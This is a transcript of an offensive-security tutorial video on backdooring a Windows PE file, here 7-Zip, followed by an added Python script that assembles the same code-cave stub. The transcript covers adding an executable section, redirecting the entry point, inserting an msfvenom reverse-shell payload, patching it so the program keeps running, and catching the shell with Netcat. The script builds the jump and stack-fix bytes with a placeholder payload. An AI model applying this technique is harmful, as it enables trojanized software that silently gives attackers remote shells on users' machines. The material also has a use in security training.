1
00:00:00,150 --> 00:00:04,970
Hello, everyone, welcome to a new video of our backdooring PE series.

2
00:00:06,570 --> 00:00:14,910
Today, we are going to learn how to backdoor a file using LordPE and the x32dbg program and some

3
00:00:14,910 --> 00:00:16,500
reverse engineering techniques.

4
00:00:18,630 --> 00:00:29,210
The tools we are going to need in this video are LordPE, x32dbg, the HxD hex editor, and that's

5
00:00:29,220 --> 00:00:29,480
it.

6
00:00:30,600 --> 00:00:33,150
We're going to backdoor 7-Zip itself.

7
00:00:33,540 --> 00:00:39,150
The 7-Zip I'm using is an older version of 7-Zip which has ASLR turned off.

8
00:00:40,620 --> 00:00:42,890
The version I'm using is version 17.

9
00:00:42,900 --> 00:00:44,760
You can download it from SourceForge.

10
00:00:46,200 --> 00:00:47,180
Should be easy.

11
00:00:48,750 --> 00:00:52,500
Let's start by copying our 7-Zip file to our desktop.

12
00:01:15,420 --> 00:01:22,080
Now let's open LordPE and then click on PE Editor, then browse for the 7-Zip file.

13
00:01:33,430 --> 00:01:35,320
Next, we click on Sections.

14
00:01:39,370 --> 00:01:47,890
We can see all sections here. Click on the last one and choose Add Section Header. I have to click

15
00:01:49,300 --> 00:01:50,350
Add Section Header.

16
00:01:53,080 --> 00:01:57,940
Now we need to edit this section by clicking on it and choosing Edit Section Header.

17
00:02:03,820 --> 00:02:04,810
Let's give it a name.

18
00:02:09,590 --> 00:02:10,440
mtest.

19
00:02:11,820 --> 00:02:17,610
Now we need to change the VirtualSize and the RawSize to 1000 bytes. You can make it less, you can

20
00:02:17,610 --> 00:02:18,870
make it more, it's up to you.

21
00:02:34,850 --> 00:02:37,040
OK, close it.

22
00:02:38,930 --> 00:02:43,910
OK, there's something I missed, which is the flags. Let's just open it again.
23
00:02:54,940 --> 00:03:01,360
Click on Flags, make sure they're all readable, writable and executable code, because we are going to execute

24
00:03:01,360 --> 00:03:07,480
our code from this section, so we need to make sure it has the executable code checked on.

25
00:03:14,700 --> 00:03:19,830
Since we haven't defined this new section yet, it is going to error if we try to open 7-Zip now.

26
00:03:23,690 --> 00:03:31,390
To fix this, we will open this file in any hex editor; in our case, we will open it in HxD.

27
00:03:36,470 --> 00:03:41,240
File, Open, let's choose our file.

28
00:03:49,120 --> 00:03:52,810
Now, go to the last byte, all the way to the bottom.

29
00:03:59,180 --> 00:04:00,830
Put the cursor here,

30
00:04:03,770 --> 00:04:08,810
then choose Insert Bytes from the File, I mean, from the Edit menu.

31
00:04:11,950 --> 00:04:17,860
Put in any number of bytes you want to fill. Since the section was 1000 bytes, we write 1000

32
00:04:17,860 --> 00:04:21,430
in the byte count, we'll leave everything else the same.

33
00:04:40,190 --> 00:04:42,850
Now, let's verify that we can open the application now.

34
00:04:47,680 --> 00:04:48,190
Very good.

35
00:04:53,770 --> 00:04:58,360
Now, let's open this application in x32dbg and go to the entry point.

36
00:05:15,300 --> 00:05:23,460
We are at the entry point now. If we go to Memory Map, you can see the structure of all the sections

37
00:05:23,460 --> 00:05:24,620
within the application.

38
00:05:25,860 --> 00:05:30,300
Notice our section that we just created, mtest.

39
00:05:40,600 --> 00:05:47,230
Now, before we continue, we need to redirect the entry point to our new section, and once we are

40
00:05:47,230 --> 00:05:51,480
done executing our new section, we need to come back here again,

41
00:05:51,490 --> 00:05:54,610
so that the execution flow of the application doesn't get corrupted.
42
00:05:56,350 --> 00:06:01,330
First, let's look again at our new section and copy its memory address from the Memory Map.

43
00:06:38,160 --> 00:06:46,320
Now, let's look at the first instruction, which is push ebp. This instruction is a one-byte opcode,

44
00:06:46,830 --> 00:06:48,020
which is 55.

45
00:06:50,070 --> 00:06:55,470
But if we change this instruction into something like jmp, then that instruction will be corrupted

46
00:06:55,650 --> 00:07:02,370
because they don't have the same opcode and we will overwrite the instruction next to it if we want to

47
00:07:02,370 --> 00:07:04,290
replace it with a jump instruction.

48
00:07:04,680 --> 00:07:12,900
The jump instruction by itself is one opcode, but if we jump to a memory address, it will require

49
00:07:12,900 --> 00:07:19,100
five hex characters, one for the opcode and four for the memory address we are jumping to.

50
00:07:21,480 --> 00:07:30,840
But if we look at the entry point instruction push ebp and the next two instructions, mov ebp, esp and push

51
00:07:31,260 --> 00:07:33,870
FFFFFFFF.

52
00:07:34,980 --> 00:07:38,100
They are a total of five hex characters.

53
00:07:38,730 --> 00:07:46,380
So if we replace this instruction with jmp and then the memory address of our new section, it will replace

54
00:07:46,380 --> 00:07:48,030
all the three instructions.

55
00:07:48,330 --> 00:07:49,440
But we don't want that.

56
00:07:50,760 --> 00:07:55,590
So since we need these three instructions later to continue the flow of our program,

57
00:07:55,590 --> 00:07:57,810
we will save them in a text file.

58
00:08:12,130 --> 00:08:15,340
Right-click, Binary, Copy.

59
00:08:31,800 --> 00:08:40,960
Since I already stepped in one time, so I'm here now, I'm going to reopen this application and import

60
00:08:40,960 --> 00:08:41,830
the 7-Zip file.
61
00:08:51,250 --> 00:08:57,160
Again, we are at the entry point now. Since we saved the first three instructions, we can replace

62
00:08:57,160 --> 00:09:01,510
the first one with jmp and then the memory address of our new section.

63
00:09:04,390 --> 00:09:11,140
We hit space and then we type jmp and then the address of the new section.

64
00:09:20,200 --> 00:09:25,240
Now, if we step into, it will go to our new section.

65
00:09:26,570 --> 00:09:31,610
Now let's save this file as a new copy so we can leave this first copy intact.

66
00:09:32,290 --> 00:09:34,510
We're going to Patch File.

67
00:09:37,310 --> 00:09:40,620
Patch File, and then we choose Patch File again.

68
00:09:41,150 --> 00:09:41,900
We give it a name.

69
00:09:49,240 --> 00:09:51,190
From now on, we will work on the new one.

70
00:10:05,190 --> 00:10:10,170
Now, there is another problem. If you remember our stack from the Linux binary exploitation

71
00:10:10,170 --> 00:10:16,110
videos, it needs to be the same when we are done executing the new section and return back to the next

72
00:10:16,110 --> 00:10:18,180
instruction after the entry point.

73
00:10:21,660 --> 00:10:27,930
So if this is our entry point, we need to come back to this instruction, the very first instruction

74
00:10:27,960 --> 00:10:34,350
after the entry point, because if we jump back to this instruction, as we

75
00:10:34,350 --> 00:10:40,890
said earlier, with the stack and registers having different values than the initial values we stored

76
00:10:40,890 --> 00:10:44,730
in them, the program won't run and it will crash.

77
00:10:45,870 --> 00:10:51,780
With that said, we need to push all registers onto the stack and restore them back right before we

78
00:10:51,780 --> 00:10:55,460
restore the first three instructions in the program that we just saved.

79
00:10:56,460 --> 00:10:59,640
Let's first step into one time and go to our new section.
80
00:11:01,150 --> 00:11:01,500
Good.

81
00:11:03,270 --> 00:11:10,320
Now, let's save the registers and the flags on the left side here. We're going to push them on the

82
00:11:10,320 --> 00:11:14,250
stack by using the pushad instruction and pushfd.

83
00:11:26,960 --> 00:11:29,210
Let's save this file as 7-Zip 3.

84
00:11:55,210 --> 00:12:01,510
We are back at the entry point. Since we need this next instruction after the entry point anyway,

85
00:12:01,510 --> 00:12:05,200
we need the memory address and we will save it into a text file.

86
00:12:26,760 --> 00:12:30,450
Let's continue and go to our new section by clicking Step Into.

87
00:12:33,210 --> 00:12:38,340
Now let's create our reverse shell TCP payload with msfvenom.

88
00:13:09,450 --> 00:13:14,270
OK, let's copy our shellcode to the text file.

89
00:13:26,080 --> 00:13:31,530
Let's copy and paste our shellcode into our program here, using the Ignore Size option.

90
00:13:34,980 --> 00:13:37,800
Binary, Paste (Ignore Size).

91
00:13:41,930 --> 00:13:48,500
It's all good, but there's one problem here with our shellcode. msfvenom shellcode has an infinite

92
00:13:48,500 --> 00:13:55,400
waiting time in the code, WaitForSingleObject, and that will prevent the execution flow from continuing

93
00:13:55,640 --> 00:13:57,410
after we get our shell.

94
00:14:03,200 --> 00:14:10,760
This instruction, dec esi, which decrements esi, will make the value of the register negative

95
00:14:10,760 --> 00:14:12,380
one, which is infinite.

96
00:14:13,220 --> 00:14:20,780
Since we don't want it to be infinite, we will leave it zero and change this instruction to nop, no operation.

97
00:14:21,800 --> 00:14:25,400
Let's find this block of code in our x32dbg.

98
00:14:45,370 --> 00:14:46,480
Now, let's compare them.

99
00:14:51,360 --> 00:14:53,420
Looks like this is the one we are looking for.
100
00:15:03,320 --> 00:15:10,580
One more thing: if you look at the shellcode, there is one call ebp at the end. This will make the

101
00:15:10,590 --> 00:15:15,100
shellcode call the exit function, but we don't want our program to exit.

102
00:15:15,110 --> 00:15:15,390
Right.

103
00:15:16,670 --> 00:15:19,280
We can also nop this instruction. For now,

104
00:15:19,280 --> 00:15:20,960
let's breakpoint on it.

105
00:15:45,100 --> 00:15:52,360
Since we pushfd and pushad at the top, we need to pop them back to restore all our registers and

106
00:15:52,360 --> 00:15:53,060
our flags.

107
00:15:53,980 --> 00:15:54,910
Let's do that here.

108
00:16:04,510 --> 00:16:11,630
Keep in mind that they have to be in reverse, so if we did pushad first, then we do popad

109
00:16:11,630 --> 00:16:12,060
last.

110
00:16:13,220 --> 00:16:17,700
Now, let's paste the three instructions that we have saved in the very beginning.

111
00:16:31,430 --> 00:16:37,100
Then the last instruction is to jump to the entry point, to continue with the execution flow of the

112
00:16:37,100 --> 00:16:37,580
program.

113
00:16:38,540 --> 00:16:40,310
We already have the address saved.

114
00:16:45,230 --> 00:16:46,880
Let's jump to this address.

115
00:16:52,850 --> 00:16:56,360
I'm going to save this file with a new name.

116
00:17:12,490 --> 00:17:15,100
Let's start a Netcat listener for our connection.

117
00:17:34,600 --> 00:17:35,020
Oops.

118
00:17:37,860 --> 00:17:41,100
We got our shell, but the program still crashed.

119
00:17:42,030 --> 00:17:43,230
Let's find out why.

120
00:18:06,990 --> 00:18:13,740
The reason why this happened is that the register ESP was changed from what we have saved on the stack

121
00:18:13,740 --> 00:18:14,230
before.

122
00:18:16,500 --> 00:18:23,370
Let's first check where ESP is pointing at after the first pushad and pushfd instructions.
123
00:18:26,410 --> 00:18:33,120
Going to step into. Now this is the beginning of our shellcode, let's check.

124
00:18:33,370 --> 00:18:34,900
Where is this pointing at?

125
00:18:40,660 --> 00:18:42,310
Let's save this address.

126
00:18:53,140 --> 00:19:02,260
Now, let's go all the way down to our nop instruction right before our popfd and popad. I

127
00:19:02,260 --> 00:19:07,900
already have a breakpoint here. Let's continue and see what's the new value of our ESP.

128
00:19:21,140 --> 00:19:24,410
It is pointing at a different location.

129
00:19:26,180 --> 00:19:27,110
Let's save this one.

130
00:19:39,040 --> 00:19:40,240
They are not the same.

131
00:19:40,620 --> 00:19:48,300
That's why when we tried to pop back all the values in the registers and EFLAGS, the ESP was not

132
00:19:48,300 --> 00:19:50,470
pointing at the same as before.

133
00:19:51,270 --> 00:19:56,580
So we need to adjust our stack to make it point at the right location.

134
00:19:57,660 --> 00:20:04,980
Let's calculate the difference using the calculator in the program and make sure it's hex.

135
00:20:06,510 --> 00:20:10,750
This is the very initial value and this is the new one.

136
00:20:11,610 --> 00:20:12,570
Let's subtract.

137
00:20:23,110 --> 00:20:31,840
We got 204 in hex, so we need to add this value to ESP to adjust it, to make it point to

138
00:20:31,840 --> 00:20:33,640
the right memory address.

139
00:20:34,780 --> 00:20:37,420
So instead of our two nops here, we will change

140
00:20:37,420 --> 00:20:42,700
it to add esp, 204.

141
00:20:48,800 --> 00:20:59,180
But notice that corrupted our instructions after it, right? Let's correct that again: popfd, popad,

142
00:21:01,760 --> 00:21:03,530
and then our three instructions.

143
00:21:16,820 --> 00:21:18,670
And then our jmp.

144
00:21:38,450 --> 00:21:41,360
Now, let's save it as a new file.

145
00:21:57,900 --> 00:21:59,970
Let's start our Netcat listener again.
146
00:22:13,980 --> 00:22:18,240
Nice, we got our shell and we were still able to open our program.

147
00:22:18,870 --> 00:22:19,410
Very good.

148
00:22:20,820 --> 00:22:22,300
This was the end of our video.

149
00:22:22,530 --> 00:22:24,600
Thanks for watching and see you in the next one.
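The code-cave layout built by hand in x32dbg throughout the video, as an added worked example that is not part of the video or its author's material. The script assembles the same bytes the video types in: the 5-byte jmp over `push ebp / mov ebp, esp / push FFFFFFFF` at the entry point, and the cave stub `pushad, pushfd, <shellcode>, add esp, <delta>, popfd, popad, <original 3 instructions>, jmp <entry + 5>`. It also does the two arithmetic steps the video does in the debugger: the rel32 encoding of both jumps, and the ESP difference (0x204 in the video) that has to be added back before popfd/popad. The entry-point and section addresses, the ESP samples and the placeholder payload are made-up values, and the msfvenom shellcode is not reproduced; only the standard library is used.

```python
"""Assemble a PE code-cave stub of the kind built in the 7-Zip walkthrough.

Added example, not the video's own code. ENTRY_VA, CAVE_VA, the ESP samples
and PAYLOAD below are assumed sample values, not taken from the video.
"""
import struct

# x86 (32-bit) opcodes used by the stub
PUSHAD = b"\x60"             # push eax, ecx, edx, ebx, esp, ebp, esi, edi
PUSHFD = b"\x9c"             # push EFLAGS
POPFD = b"\x9d"
POPAD = b"\x61"
NOP = b"\x90"
JMP_REL32 = b"\xe9"          # jmp rel32, 5 bytes in total
ADD_ESP_IMM32 = b"\x81\xc4"  # add esp, imm32, 6 bytes in total

# The three entry-point instructions the 5-byte jmp overwrites (as in the video):
#   push ebp (55) ; mov ebp, esp (8B EC) ; push 0FFFFFFFFh (6A FF)
ORIGINAL_ENTRY_BYTES = b"\x55\x8b\xec\x6a\xff"


def jmp_rel32(src, dst):
    """Encode `jmp dst` for a jmp placed at address src.

    rel32 is measured from the end of the 5-byte instruction, so a jump back
    into the original code from the cave gets a negative displacement.
    """
    rel = dst - (src + 5)
    return JMP_REL32 + struct.pack("<i", rel)


def jmp_target(instr, addr):
    """Decode where a jmp rel32 located at address addr lands."""
    if len(instr) != 5 or instr[:1] != JMP_REL32:
        raise ValueError("not a jmp rel32")
    return addr + 5 + struct.unpack("<i", instr[1:])[0]


def add_esp(delta):
    """add esp, delta (the 'add esp, 204' the video writes over its two nops)."""
    return ADD_ESP_IMM32 + struct.pack("<I", delta)


def nop_out(code, offset, length):
    """Replace length bytes at offset with nops, without shifting anything.

    The video does this twice to the msfvenom payload: the `dec esi` before
    WaitForSingleObject (so the timeout stays 0 instead of INFINITE) and the
    final `call ebp` that would otherwise call the exit function.
    """
    return code[:offset] + NOP * length + code[offset + length:]


def stack_delta(esp_after_pushes, esp_before_pops):
    """Bytes to add back to ESP so popfd/popad read what pushad/pushfd wrote.

    Both values are read in the debugger: ESP right after pushad/pushfd and
    ESP at the nop right before popfd. The video measured 0x204.
    """
    delta = esp_after_pushes - esp_before_pops
    if delta < 0:
        raise ValueError("ESP grew instead of shrinking; check the breakpoints")
    return delta


def build_entry_hook(entry_va, cave_va, original=ORIGINAL_ENTRY_BYTES):
    """The patch written at the entry point: jmp cave, nop-padded to cover
    whole instructions (here the jmp is exactly the 5 bytes it replaces)."""
    hook = jmp_rel32(entry_va, cave_va)
    if len(original) < len(hook):
        raise ValueError("jmp would overwrite more than the saved instructions")
    return hook + NOP * (len(original) - len(hook))


def build_cave(cave_va, entry_va, payload, esp_delta, original=ORIGINAL_ENTRY_BYTES):
    """pushad; pushfd; payload; add esp, delta; popfd; popad; original; jmp back."""
    stub = PUSHAD + PUSHFD + payload + add_esp(esp_delta) + POPFD + POPAD + original
    resume_va = entry_va + len(original)      # first untouched instruction
    stub += jmp_rel32(cave_va + len(stub), resume_va)
    return stub


if __name__ == "__main__":
    ENTRY_VA = 0x004F1A2C          # assumed entry point address
    CAVE_VA = 0x00529000           # assumed address of the new 1000-byte section
    PAYLOAD = NOP * 32             # constructed stand-in for the msfvenom shellcode
    delta = stack_delta(0x0019FF70, 0x0019FD6C)   # assumed ESP readings, gives 0x204
    cave = build_cave(CAVE_VA, ENTRY_VA, PAYLOAD, delta)
    assert len(cave) <= 1000, "stub does not fit in the added section"
    print("entry hook:", build_entry_hook(ENTRY_VA, CAVE_VA).hex())
    print("cave stub :", cave.hex())
```

When the real payload is used, the ESP delta must be re-measured after the two nop patches, since `stack_delta` only reports what the debugger showed; the value depends on the shellcode, not on the stub around it.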